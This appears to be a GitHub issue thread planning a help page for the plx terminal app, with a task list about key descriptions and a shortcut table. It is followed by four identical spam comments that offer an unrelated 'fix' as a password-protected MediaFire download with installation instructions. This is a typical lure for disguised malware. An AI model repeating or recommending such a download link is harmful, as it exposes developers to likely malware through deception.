### ISSUE TITLE
Feat: Help page

### ISSUE THREAD

**Issue by samuelroland** [plx-pdg/plx#69]
This is not a priority, we'll see if we can implement this for PDG, but here are some notes/tasks for the implementation of the help page:
- [ ] Build an Excalidraw mockup and ask for reviews
- [x] Create a new file `help.rs` under `ui::pages`
- [x] Think about the given structure or change it:
  - [x] Add an optional (Option) description for each `core::models::key::Key` via a method `describe()`
  - [x] Add an alternative list, (j -> "down") as string for each key with alternative via a method `alt()`.
- [x] Show this list inside a table, with color on the shortcut, the alternatives in the same cells, and another cell for the dim() the description
- [ ] Allow scrolling without selection if list is too long

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
